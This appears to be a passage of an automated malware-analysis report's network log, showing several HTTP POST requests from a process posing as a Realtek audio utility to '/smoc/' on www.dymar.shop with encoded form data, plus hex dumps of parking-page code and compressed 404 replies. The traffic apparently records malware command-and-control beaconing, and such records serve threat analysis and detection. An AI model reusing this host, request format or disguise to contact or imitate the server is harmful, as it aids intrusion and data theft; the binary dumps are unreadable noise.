                                                                                                  Dec 3, 2024 09:50:54.125838041 CET1289INData Raw: 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f
                                                                                                  Data Ascii: ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;lin
                                                                                                  Dec 3, 2024 09:50:54.125941992 CET1289INData Raw: 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74
                                                                                                  Data Ascii: ze:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:
                                                                                                  Dec 3, 2024 09:50:54.125952005 CET1289INData Raw: 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f
                                                                                                  Data Ascii: -graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidde
                                                                                                  Dec 3, 2024 09:50:54.125960112 CET1289INData Raw: 46 69 6e 64 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d
                                                                                                  Data Ascii: Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hosting</div><br><p>Add your website to any of your hosting plans. Follow the article
                                                                                                  Dec 3, 2024 09:50:54.126202106 CET1289INData Raw: 54 46 2d 31 36 20 76 61 6c 75 65 22 29 3b 36 35 35 33 35 3c 72 26 26 28 72 2d 3d 36 35 35 33 36 2c 65 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 72 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 29 2c 72 3d
                                                                                                  Data Ascii: TF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75*(o<26)-((0!=r)<<5)}function n(r,e,n){var t;
                                                                                                  Dec 3, 2024 09:50:54.126368046 CET1289INData Raw: 68 61 72 43 6f 64 65 41 74 28 30 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 75 74 66 31 36 2e 65 6e 63 6f 64 65 28 6d 29 7d 2c 74 68 69 73 2e 65 6e 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 61 29 7b 76 61 72 20 68 2c 66 2c 69 2c 63 2c 75
                                                                                                  Data Ascii: harCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLowerCase())).length;if(a)for(d=0;d<v;d++)w[d]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  53192.168.11.3049918185.68.16.160805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:50:59.823410988 CET666OUTPOST /smoc/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.dymar.shop
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.dymar.shop
                                                                                                  Referer: http://www.dymar.shop/smoc/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 6f 4e 39 52 53 4f 7a 6d 4f 75 4e 6b 45 31 68 41 46 2f 58 46 71 72 53 61 35 59 6a 61 30 66 4d 79 69 62 30 6b 51 31 68 45 50 70 30 6b 75 37 30 67 65 31 62 4e 4d 70 6a 48 59 47 6f 72 7a 6a 2f 36 30 61 70 77 34 2f 39 70 46 44 39 5a 39 4a 44 34 77 42 64 46 4d 39 68 70 58 47 76 47 48 62 6f 77 35 43 53 75 39 6a 6c 6a 30 44 7a 6b 35 71 4f 4e 2f 4e 41 6f 6a 74 4c 4a 34 71 46 33 55 49 56 72 2b 7a 78 59 70 35 30 31 62 31 6c 61 52 57 65 67 2b 46 30 48 69 52 46 74 2f 6a 7a 45 30 36 7a 70 75 48 32 56 4c 41 35 48 57 73 4e 77 4c 6a 53 46 30 4e 77 54 6f 4b 4f 7a 66 33 78 64 75 4b 75 49 32 51 3d 3d
                                                                                                  Data Ascii: 6aonl5x=oN9RSOzmOuNkE1hAF/XFqrSa5Yja0fMyib0kQ1hEPp0ku70ge1bNMpjHYGorzj/60apw4/9pFD9Z9JD4wBdFM9hpXGvGHbow5CSu9jlj0Dzk5qON/NAojtLJ4qF3UIVr+zxYp501b1laRWeg+F0HiRFt/jzE06zpuH2VLA5HWsNwLjSF0NwToKOzf3xduKuI2Q==
                                                                                                  Dec 3, 2024 09:51:00.174305916 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Tue, 03 Dec 2024 08:51:00 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: OCSESSID=986a93ea4e1358e82a53132334; path=/
                                                                                                  Set-Cookie: language=ru-ru; expires=Thu, 02-Jan-2025 08:50:59 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                                  Set-Cookie: currency=UAH; expires=Thu, 02-Jan-2025 08:50:59 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                                  x-ray: wnp32698:0.140/wn32698:0.130/wa32698:D=134660
                                                                                                  Content-Encoding: br
                                                                                                  Data Raw: 65 34 33 0d 0a 15 66 41 44 54 93 7a 00 8c d4 48 4d 73 7b 84 0c 73 df eb f2 b3 e7 bd 14 fd ac 72 d9 2f 1e 10 e0 73 d7 68 8f d3 7f ef 53 60 19 b4 1f 10 11 e0 6f 27 7d 99 a2 99 29 da 2c ea f4 b8 5f 43 d9 29 00 9c ed 26 83 12 99 ff da 5b cd ee 0c d9 9d 44 22 31 f2 42 34 1e 23 96 17 ba ab ba ff ec 54 ba dd da 7c 21 86 ee f7 fb f7 ff 13 2f 84 a8 48 d1 6d 9d 22 05 61 50 8a c2 82 15 b3 a8 93 20 2c 42 49 6c 0c cd 3d 34 2e 40 4e 30 fd 9a d4 c6 50 9b ab 33 15 03 88 78 60 fa df 10 23 c0 2a c9 7e 90 cf f6 00 bb fb 5f d9 ee 6c dc 01 6b f8 aa b8 ab 79 af 8f 77 75 73 26 fc 58 cf c3 59 b3 16 a5 2c 87 cd d2 6c 26 27 e5 50 12 28 c0 c4 ee fe b4 b5 98 24 a8 54 ca 2d 14 07 3c fa 3a 15 00 6c 6b db 5e 82 37 75 26 c4 ff 20 5b e8 7a 1f 09 e0 05 74 cd 7d f6 e7 46 fb 50 e0 ef 2b 20 52 00 ab 54 f2 60 37 96 09 3d e0 8d d4 01 95 e6 14 84 6c 68 4d 8e 96 4c 0e ab 67 20 7d ea ed 33 59 2c 0a 82 46 7c 49 34 7f 8f f6 98 09 21 52 a9 13 bb fb 99 26 54 45 17 02 a0 56 2b 2c 3e 83 47 44 64 08 08 0d a2 02 00 f3 5c 44 3c 20 00 ca 84 3f ec 0b [TRUNCATED]
                                                                                                  Data Ascii: e43fADTzHMs{sr/shS`o'}),_C)&[D"1B4#T|!/Hm"aP ,BIl=4.@N0P3x`#*~_lkywus&XY,l&'P($T-<:lk^7u& [zt}FP+ RT`7=lhMLg }3Y,F|I4!R&TEV+,>GDd\D< ?+$"IiYLD~1r{?xY6EEo8;~qka}ezg/23`Z$DP]qq>ugkOnWfv0z,,</Aqb%?I1CD8<+rEI|WX!On$?-QrtCIAau;_j.2=@)C!wg/?BQjK->D"h^"rALMGC[ZJ's{z0fdgB{X]vC0$MUT=e{~uzTS*X>LU|*eGe5i`q
                                                                                                  Dec 3, 2024 09:51:00.174319029 CET1289INData Raw: ab 82 6d ab 8f 60 89 d1 3a 50 6d 02 73 0f 4a fe 3c 6d 5b e3 61 70 9d 5d 82 f7 a8 1c c7 3c 35 ed 08 6f 5c a7 10 4e 81 60 f1 18 2c 55 7d ec db ea 63 ae 3d 18 90 68 c2 52 75 8e e9 03 99 29 9d 45 93 52 b7 3d f5 f7 1c ae 89 84 a2 51 af e2 33 5a db 1c
                                                                                                  Data Ascii: m`:PmsJ<m[ap]<5o\N`,U}c=hRu)ER=Q3Zj5n<"2YRUB27mr}y>!kAZ%Zi8`C8")D09lN1J^Q>Z 5k7$2SlqSh&R0(2.^ekbP"39[
                                                                                                  Dec 3, 2024 09:51:00.174335003 CET1289INData Raw: c8 ff e9 38 b5 f7 74 9f 8d 35 67 74 51 9f 59 98 c4 4f d1 5e d4 8e 58 29 34 3e 23 2b 15 c4 3a f5 5a ad 64 27 28 ae 75 b5 7e 95 bb fa 82 85 2c a2 96 07 91 f1 1e b2 b1 72 31 6b b6 6e ba 87 cb 95 a4 7a 10 49 a3 b9 69 77 e9 ed 62 b3 6b d5 44 0e 3d d6
                                                                                                  Data Ascii: 8t5gtQYO^X)4>#+:Zd'(u~,r1knzIiwbkD=#;mACgI<y%%!LVJ4X=<NuVMW4zd)|Ze/13j_S}mH=/|~+SrgB}=`U9w
                                                                                                  Dec 3, 2024 09:51:00.174484968 CET322INData Raw: 62 ac 18 0a 18 08 d2 de 5a c3 34 95 a9 46 77 29 5f 18 7e 30 a0 0d 13 40 fe 68 5a ef 16 24 f9 cc 32 0f 09 e2 ff 1b a8 88 5b 0d cf bc 09 cc da 60 43 9a 16 e5 0a 70 f5 06 4c d6 3b 8e 6e 2c 2a b2 48 0c 51 56 0d f4 21 88 0c 52 28 d0 6d 7b 87 09 3a 00
                                                                                                  Data Ascii: bZ4Fw)_~0@hZ$2[`CpL;n,*HQV!R(m{:B=N;lm`2xhAB?'IxZ;`}SfTO13CHp:tr}cme+CWH2^3PYIFsV\.@G8')P\gT&#*bDKp


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  54192.168.11.3049919185.68.16.160805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:51:02.569658041 CET686OUTPOST /smoc/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.dymar.shop
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.dymar.shop
                                                                                                  Referer: http://www.dymar.shop/smoc/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 6f 4e 39 52 53 4f 7a 6d 4f 75 4e 6b 46 57 35 41 47 64 2f 46 76 4c 53 62 7a 34 6a 61 39 2f 4d 70 69 62 77 6b 51 77 5a 71 50 37 51 6b 70 65 49 67 4d 6b 62 4e 41 4a 6a 48 4e 32 6f 55 33 6a 2f 6c 30 61 74 53 34 2b 42 70 46 48 56 5a 39 4e 54 34 78 79 46 47 4f 74 68 72 4a 6d 76 45 59 72 6f 77 35 43 53 75 39 6a 78 4e 30 44 72 6b 34 62 2b 4e 38 73 41 72 38 64 4b 37 76 61 46 33 51 49 56 33 2b 7a 77 4e 70 38 49 66 62 77 68 61 52 54 69 67 6e 77 59 45 70 52 46 76 77 44 79 4e 6b 71 57 53 6d 47 4f 6c 44 48 46 79 52 5a 4a 34 48 55 2f 66 70 4f 45 52 37 71 79 65 44 32 63 31 73 49 76 54 72 61 41 44 34 41 45 30 41 57 48 47 4d 4c 41 67 58 43 6e 42 78 35 6f 3d
                                                                                                  Data Ascii: 6aonl5x=oN9RSOzmOuNkFW5AGd/FvLSbz4ja9/MpibwkQwZqP7QkpeIgMkbNAJjHN2oU3j/l0atS4+BpFHVZ9NT4xyFGOthrJmvEYrow5CSu9jxN0Drk4b+N8sAr8dK7vaF3QIV3+zwNp8IfbwhaRTignwYEpRFvwDyNkqWSmGOlDHFyRZJ4HU/fpOER7qyeD2c1sIvTraAD4AE0AWHGMLAgXCnBx5o=
                                                                                                  Dec 3, 2024 09:51:02.915153980 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Tue, 03 Dec 2024 08:51:02 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: OCSESSID=cec7612f96f92161a6b10eaedb; path=/
                                                                                                  Set-Cookie: language=ru-ru; expires=Thu, 02-Jan-2025 08:51:02 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                                  Set-Cookie: currency=UAH; expires=Thu, 02-Jan-2025 08:51:02 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                                  x-ray: wnp32698:0.140/wn32698:0.130/wa32698:D=129239
                                                                                                  Content-Encoding: br
                                                                                                  Data Raw: 65 34 33 0d 0a 15 66 41 44 54 93 7a 00 8c d4 48 4d 73 7b 84 0c 73 df eb f2 b3 e7 bd 14 fd ac 72 d9 2f 1e 10 e0 73 d7 68 8f d3 7f ef 53 60 19 b4 1f 10 11 e0 6f 27 7d 99 a2 99 29 da 2c ea f4 b8 5f 43 d9 29 00 9c ed 26 83 12 99 ff da 5b cd ee 0c d9 9d 44 22 31 f2 42 34 1e 23 96 17 ba ab ba ff ec 54 ba dd da 7c 21 86 ee f7 fb f7 ff 13 2f 84 a8 48 d1 6d 9d 22 05 61 50 8a c2 82 15 b3 a8 93 20 2c 42 49 6c 0c cd 3d 34 2e 40 4e 30 fd 9a d4 c6 50 9b ab 33 15 03 88 78 60 fa df 10 23 c0 2a c9 7e 90 cf f6 00 bb fb 5f d9 ee 6c dc 01 6b f8 aa b8 ab 79 af 8f 77 75 73 26 fc 58 cf c3 59 b3 16 a5 2c 87 cd d2 6c 26 27 e5 50 12 28 c0 c4 ee fe b4 b5 98 24 a8 54 ca 2d 14 07 3c fa 3a 15 00 6c 6b db 5e 82 37 75 26 c4 ff 20 5b e8 7a 1f 09 e0 05 74 cd 7d f6 e7 46 fb 50 e0 ef 2b 20 52 00 ab 54 f2 60 37 96 09 3d e0 8d d4 01 95 e6 14 84 6c 68 4d 8e 96 4c 0e ab 67 20 7d ea ed 33 59 2c 0a 82 46 7c 49 34 7f 8f f6 98 09 21 52 a9 13 bb fb 99 26 54 45 17 02 a0 56 2b 2c 3e 83 47 44 64 08 08 0d a2 02 00 f3 5c 44 3c 20 00 ca 84 3f ec 0b [TRUNCATED]
                                                                                                  Data Ascii: e43fADTzHMs{sr/shS`o'}),_C)&[D"1B4#T|!/Hm"aP ,BIl=4.@N0P3x`#*~_lkywus&XY,l&'P($T-<:lk^7u& [zt}FP+ RT`7=lhMLg }3Y,F|I4!R&TEV+,>GDd\D< ?+$"IiYLD~1r{?xY6EEo8;~qka}ezg/23`Z$DP]qq>ugkOnWfv0z,,</Aqb%?I1CD8<+rEI|WX!On$?-QrtCIAau;_j.2=@)C!wg/?BQjK->D"h^"rALMGC[ZJ's{z0fdgB{X]vC0$MUT=e{~uzTS*X>LU|*eGe5i`q
                                                                                                  Dec 3, 2024 09:51:02.915256977 CET1289INData Raw: ab 82 6d ab 8f 60 89 d1 3a 50 6d 02 73 0f 4a fe 3c 6d 5b e3 61 70 9d 5d 82 f7 a8 1c c7 3c 35 ed 08 6f 5c a7 10 4e 81 60 f1 18 2c 55 7d ec db ea 63 ae 3d 18 90 68 c2 52 75 8e e9 03 99 29 9d 45 93 52 b7 3d f5 f7 1c ae 89 84 a2 51 af e2 33 5a db 1c
                                                                                                  Data Ascii: m`:PmsJ<m[ap]<5o\N`,U}c=hRu)ER=Q3Zj5n<"2YRUB27mr}y>!kAZ%Zi8`C8")D09lN1J^Q>Z 5k7$2SlqSh&R0(2.^ekbP"39[
                                                                                                  Dec 3, 2024 09:51:02.915271044 CET1289INData Raw: c8 ff e9 38 b5 f7 74 9f 8d 35 67 74 51 9f 59 98 c4 4f d1 5e d4 8e 58 29 34 3e 23 2b 15 c4 3a f5 5a ad 64 27 28 ae 75 b5 7e 95 bb fa 82 85 2c a2 96 07 91 f1 1e b2 b1 72 31 6b b6 6e ba 87 cb 95 a4 7a 10 49 a3 b9 69 77 e9 ed 62 b3 6b d5 44 0e 3d d6
                                                                                                  Data Ascii: 8t5gtQYO^X)4>#+:Zd'(u~,r1knzIiwbkD=#;mACgI<y%%!LVJ4X=<NuVMW4zd)|Ze/13j_S}mH=/|~+SrgB}=`U9w
                                                                                                  Dec 3, 2024 09:51:02.915374041 CET322INData Raw: 62 ac 18 0a 18 08 d2 de 5a c3 34 95 a9 46 77 29 5f 18 7e 30 a0 0d 13 40 fe 68 5a ef 16 24 f9 cc 32 0f 09 e2 ff 1b a8 88 5b 0d cf bc 09 cc da 60 43 9a 16 e5 0a 70 f5 06 4c d6 3b 8e 6e 2c 2a b2 48 0c 51 56 0d f4 21 88 0c 52 28 d0 6d 7b 87 09 3a 00
                                                                                                  Data Ascii: bZ4Fw)_~0@hZ$2[`CpL;n,*HQV!R(m{:B=N;lm`2xhAB?'IxZ;`}SfTO13CHp:tr}cme+CWH2^3PYIFsV\.@G8')P\gT&#*bDKp


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  55192.168.11.3049920185.68.16.160805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:51:05.317981005 CET2578OUTPOST /smoc/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.dymar.shop
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.dymar.shop
                                                                                                  Referer: http://www.dymar.shop/smoc/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 6f 4e 39 52 53 4f 7a 6d 4f 75 4e 6b 46 57 35 41 47 64 2f 46 76 4c 53 62 7a 34 6a 61 39 2f 4d 70 69 62 77 6b 51 77 5a 71 50 37 59 6b 70 6f 63 67 65 58 44 4e 4f 70 6a 48 52 6d 6f 76 33 6a 2b 2f 30 61 56 57 34 2b 4e 54 46 42 52 5a 2b 76 62 34 35 6a 46 47 45 74 68 72 42 47 76 46 48 62 6f 70 35 43 6a 70 39 6a 68 4e 30 44 72 6b 34 59 6d 4e 6f 4e 41 72 2b 64 4c 4a 34 71 46 37 55 49 56 4c 2b 7a 6f 64 70 39 38 6c 62 31 64 61 52 6a 53 67 6e 69 67 45 70 52 46 76 33 44 79 51 6b 71 71 54 6d 47 58 6d 44 43 35 39 52 74 4a 34 58 69 54 47 74 71 63 63 6f 49 44 54 4a 69 4d 5a 6a 65 33 51 70 74 59 43 32 6a 67 37 58 46 75 73 4d 72 55 44 48 54 7a 46 6d 4e 4f 45 30 4d 53 4b 6d 44 62 36 50 48 46 66 37 45 48 6e 67 48 35 4c 49 45 57 6f 44 39 69 55 34 44 55 48 5a 4a 66 46 69 48 32 35 73 4e 67 51 66 64 6a 4e 72 49 6e 54 2f 5a 31 6c 4c 2b 2b 70 63 46 44 7a 34 56 30 33 49 6d 58 46 69 59 71 66 39 4c 62 43 48 61 6d 62 6d 75 58 31 56 2f 73 67 4e 7a 35 6c 58 31 70 6a 49 57 46 41 52 43 52 76 4d 6e 6a 4e 4f 78 [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=oN9RSOzmOuNkFW5AGd/FvLSbz4ja9/MpibwkQwZqP7YkpocgeXDNOpjHRmov3j+/0aVW4+NTFBRZ+vb45jFGEthrBGvFHbop5Cjp9jhN0Drk4YmNoNAr+dLJ4qF7UIVL+zodp98lb1daRjSgnigEpRFv3DyQkqqTmGXmDC59RtJ4XiTGtqccoIDTJiMZje3QptYC2jg7XFusMrUDHTzFmNOE0MSKmDb6PHFf7EHngH5LIEWoD9iU4DUHZJfFiH25sNgQfdjNrInT/Z1lL++pcFDz4V03ImXFiYqf9LbCHambmuX1V/sgNz5lX1pjIWFARCRvMnjNOxO/DY6Jv8l9EFZG5b2IYw7AW88l4ehuAivCq23GL1GzkeXgb19EnDQKuXWxYInkh0BxjcU67ECU4kSexEAB5lGJUV0QR9p+oi6kbJO8s381KErC68GYh90VBUREQESAscatoXXOC6WC3Z7ph34LUD4SevGnTTyOcgwVAEnrIwmF0ZDTeAYTTdIRshMi23V1+3UXUGYegIWbQes3G7DOBOhQ9wMVKsMfiSwQ3PqM1peiq/BDYtIJi6EOQUtNprGbVPjwC7MRbOMqROU3GGj27P2PJzWqUS31QAh6m7zOhfEBgAA610RfBaBKJCyobg0Qyc1HHvtDsUSjzxKws4r5UVtLzTrDKiD0Wq0mQjYr+Mw1FrFS/PjQU0LS6D8cZiOVEMnefV6bwtGVIjycTkTrHc4vkvC8YW4P6iu9OxXDeE6LF9Uf4RuEw3Xy2A8PCou/4+bWjl4xVsR0Bhmnqb0LdujTl8Gi1PHvFY1fyLg1EuZr55j/wsOmvykJV3Fi8KbucwBpCxiBRcaLG5sfe3TUMij0r5qy1h4o+wUhfxeNLb8zto1vqDReL7ONumUqFPhdHMASxMv1hibo5hinDXh0+rRMN2fyZqaStGgzmehGHMRupajvbGocGjouIr1mL0Cmy+O8Wh3DBkruZ1gvB6HSJa9Laf5AasecWkWY [TRUNCATED]
                                                                                                  Dec 3, 2024 09:51:05.318000078 CET1225OUTData Raw: 36 4c 66 75 6b 2b 4c 62 68 47 50 32 6b 63 4b 49 54 77 4e 70 49 71 56 46 4d 68 63 38 36 33 30 46 4f 53 35 31 67 33 78 73 38 6c 50 6a 74 65 77 45 4a 54 73 65 48 62 4a 74 6d 73 73 30 6a 79 61 54 43 64 46 75 7a 72 52 69 53 59 4d 69 55 43 48 42 7a 56
                                                                                                  Data Ascii: 6Lfuk+LbhGP2kcKITwNpIqVFMhc8630FOS51g3xs8lPjtewEJTseHbJtmss0jyaTCdFuzrRiSYMiUCHBzVWGUsv5wBmZsSTY1BjkmguMbBzn4o9h2KJuUqde04nMT72cZBwDSTT+MzSVDzrb/iJrLkVG8NMCWIzp8KLQoM2tV0EURHBcPCfSRvcpY0Hnji3p0Lkiuoy/5tCQrHcKnAPAN7xfg/EszR+mAfShXm+nUpBLeKeY8qn
                                                                                                  Dec 3, 2024 09:51:05.648806095 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Tue, 03 Dec 2024 08:51:05 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: OCSESSID=cbe2e68023be194cdea8c481f5; path=/
                                                                                                  Set-Cookie: language=ru-ru; expires=Thu, 02-Jan-2025 08:51:05 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                                  Set-Cookie: currency=UAH; expires=Thu, 02-Jan-2025 08:51:05 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                                  x-ray: wnp32698:0.120/wn32698:0.120/wa32698:D=115771
                                                                                                  Content-Encoding: br
                                                                                                  Data Raw: 65 34 33 0d 0a 15 66 41 44 54 93 7a 00 8c d4 48 4d 73 7b 84 0c 73 df eb f2 b3 e7 bd 14 fd ac 72 d9 2f 1e 10 e0 73 d7 68 8f d3 7f ef 53 60 19 b4 1f 10 11 e0 6f 27 7d 99 a2 99 29 da 2c ea f4 b8 5f 43 d9 29 00 9c ed 26 83 12 99 ff da 5b cd ee 0c d9 9d 44 22 31 f2 42 34 1e 23 96 17 ba ab ba ff ec 54 ba dd da 7c 21 86 ee f7 fb f7 ff 13 2f 84 a8 48 d1 6d 9d 22 05 61 50 8a c2 82 15 b3 a8 93 20 2c 42 49 6c 0c cd 3d 34 2e 40 4e 30 fd 9a d4 c6 50 9b ab 33 15 03 88 78 60 fa df 10 23 c0 2a c9 7e 90 cf f6 00 bb fb 5f d9 ee 6c dc 01 6b f8 aa b8 ab 79 af 8f 77 75 73 26 fc 58 cf c3 59 b3 16 a5 2c 87 cd d2 6c 26 27 e5 50 12 28 c0 c4 ee fe b4 b5 98 24 a8 54 ca 2d 14 07 3c fa 3a 15 00 6c 6b db 5e 82 37 75 26 c4 ff 20 5b e8 7a 1f 09 e0 05 74 cd 7d f6 e7 46 fb 50 e0 ef 2b 20 52 00 ab 54 f2 60 37 96 09 3d e0 8d d4 01 95 e6 14 84 6c 68 4d 8e 96 4c 0e ab 67 20 7d ea ed 33 59 2c 0a 82 46 7c 49 34 7f 8f f6 98 09 21 52 a9 13 bb fb 99 26 54 45 17 02 a0 56 2b 2c 3e 83 47 44 64 08 08 0d a2 02 00 f3 5c 44 3c 20 00 ca 84 3f ec 0b [TRUNCATED]
                                                                                                  Data Ascii: e43fADTzHMs{sr/shS`o'}),_C)&[D"1B4#T|!/Hm"aP ,BIl=4.@N0P3x`#*~_lkywus&XY,l&'P($T-<:lk^7u& [zt}FP+ RT`7=lhMLg }3Y,F|I4!R&TEV+,>GDd\D< ?+$"IiYLD~1r{?xY6EEo8;~qka}ezg/23`Z$DP]qq>ugkOnWfv0z,,</Aqb%?I1CD8<+rEI|WX!On$?-QrtCIAau;_j.2=@)C!wg/?BQjK->D"h^"rALMGC[ZJ's{z0fdgB{X]vC0$MUT=e{~uzTS*X>LU|*eGe5i`q
                                                                                                  Dec 3, 2024 09:51:05.648819923 CET1289INData Raw: ab 82 6d ab 8f 60 89 d1 3a 50 6d 02 73 0f 4a fe 3c 6d 5b e3 61 70 9d 5d 82 f7 a8 1c c7 3c 35 ed 08 6f 5c a7 10 4e 81 60 f1 18 2c 55 7d ec db ea 63 ae 3d 18 90 68 c2 52 75 8e e9 03 99 29 9d 45 93 52 b7 3d f5 f7 1c ae 89 84 a2 51 af e2 33 5a db 1c
                                                                                                  Data Ascii: m`:PmsJ<m[ap]<5o\N`,U}c=hRu)ER=Q3Zj5n<"2YRUB27mr}y>!kAZ%Zi8`C8")D09lN1J^Q>Z 5k7$2SlqSh&R0(2.^ekbP"39[
                                                                                                  Dec 3, 2024 09:51:05.648910046 CET1289INData Raw: c8 ff e9 38 b5 f7 74 9f 8d 35 67 74 51 9f 59 98 c4 4f d1 5e d4 8e 58 29 34 3e 23 2b 15 c4 3a f5 5a ad 64 27 28 ae 75 b5 7e 95 bb fa 82 85 2c a2 96 07 91 f1 1e b2 b1 72 31 6b b6 6e ba 87 cb 95 a4 7a 10 49 a3 b9 69 77 e9 ed 62 b3 6b d5 44 0e 3d d6
                                                                                                  Data Ascii: 8t5gtQYO^X)4>#+:Zd'(u~,r1knzIiwbkD=#;mACgI<y%%!LVJ4X=<NuVMW4zd)|Ze/13j_S}mH=/|~+SrgB}=`U9w
                                                                                                  Dec 3, 2024 09:51:05.648920059 CET322INData Raw: 62 ac 18 0a 18 08 d2 de 5a c3 34 95 a9 46 77 29 5f 18 7e 30 a0 0d 13 40 fe 68 5a ef 16 24 f9 cc 32 0f 09 e2 ff 1b a8 88 5b 0d cf bc 09 cc da 60 43 9a 16 e5 0a 70 f5 06 4c d6 3b 8e 6e 2c 2a b2 48 0c 51 56 0d f4 21 88 0c 52 28 d0 6d 7b 87 09 3a 00
